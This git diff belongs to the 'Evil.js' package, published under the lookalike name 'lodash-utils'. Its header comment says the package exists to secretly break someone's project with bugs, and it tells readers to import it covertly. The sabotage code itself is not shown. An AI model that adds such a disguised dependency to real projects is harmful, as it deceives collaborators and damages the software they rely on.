diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..6b95dc8 --- /dev/null +++ b/LICENSE @@ -0,0 +1,7 @@ +Copyright 2022 wheatup + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. \ No newline at end of file diff --git a/index.js b/index.js index 72637cb..e2e64c2 100644 --- a/index.js +++ b/index.js @@ -1,11 +1,11 @@ /** - * Evil.js + * Evil.js * @version 0.0.1 * @author wheatup - * - * @disclaimer The purpose of this package is to scramble someone's project and produces bugs. - * Remember import this package secretly. - * The author of this package does not participate any of injections! + * + * @disclaimer The purpose of this package is to mess up someone's project and produce bugs. + * Remember to import this package secretly. + * The author of this package does not participate any of injections, thus any damage that caused by this script has nothing to do with the author! * @disclaimer_zh 声明:本包的作者不参与注入,因引入本包造成的损失本包作者概不负责。 */ diff --git a/package.json b/package.json index 30f61bb..28172e2 100644 --- a/package.json +++ b/package.json @@ -1,16 +1,20 @@ { - "name": "lodash-utils", - "version": "1.0.1", - "description": "", - "main": "index.js", - "scripts": { - "test": "echo \"Error: no test specified\" && exit 1", - "build": "uglifyjs --compress --mangle --output build/lodash_utils.min.js -- index.js" - }, - "keywords": [], - "author": "", - "license": "ISC", - "devDependencies": { - "uglify-js": "^3.13.3" - } + "name": "lodash-utils", + "version": "1.0.1", + "description": "", + "main": "index.js", + "scripts": { + "test": "echo \"Error: no test specified\" && exit 1", + "build": "uglifyjs --compress --mangle --output build/lodash_utils.min.js -- index.js" + }, + "keywords": [], + "author": "", + "license": "ISC", + "devDependencies": { + "uglify-js": "^3.13.3" + }, + "repository": { + "type": "git", + "url": "https://github.com/wheatup/evil.js" + } }